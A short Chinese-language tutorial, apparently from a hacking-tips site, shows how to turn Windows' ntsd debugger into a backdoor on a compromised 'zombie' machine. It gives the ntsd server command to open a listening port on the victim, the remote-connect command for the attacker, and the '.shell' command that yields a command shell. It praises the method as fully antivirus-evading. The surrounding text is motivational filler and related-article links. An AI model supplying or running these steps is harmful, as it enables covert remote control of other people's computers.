微软的“后门”Ntsd的远程调试功能如何利用图解

执着追求和不断的分析,这是走向成功的双翼。不执着,便容易半途而废;不分析,便容易一条道走到天黑。

1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。微软的“后门”Ntsd的远程调试功能利用 - 叶湘笑 - 纯白色 

2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时 server 端(就是第一步监听的那个)会显示:0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。

微软的“后门”Ntsd的远程调试功能利用 - 叶湘笑 - 纯白色

3.输入:.shell,取得 shell,操作和 Cmd 完全一样,权限是服务端运行ntsd.exe的用户权限。

微软的“后门”Ntsd的远程调试功能利用 - 叶湘笑 - 纯白色

又是个留后门的好方法,全免杀,而且永不被杀……

这个其实是 NTSD.exe 的正常功能,远程调试功能,更多说明自己谷歌搜索,这是一个 windows 命令行下的调试工具,功能十分强大。

到此这篇关于微软的“后门”Ntsd的远程调试功能如何利用图解就介绍到这了。优秀是一种,越优秀就越想去,越努力就会越优秀。反过来也是一样,活得越差就越不想要去做些什么,或许是无力或许是真的太差了无从下手,于是越来越差,越差就越没动力去做,渐渐呆在舒适区,坐以待毙。更多相关微软的“后门”Ntsd的远程调试功能如何利用图解内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

您可能有感兴趣的文章
什么是CC攻击 判断网站是否被CC攻击并且如何防御CC攻击

Windows系统安全风险-本地NTLM重放提权

文件上传漏洞全面渗透分析小结

sql手工注入语句&SQL手工注入大全

详解Filezilla server 提权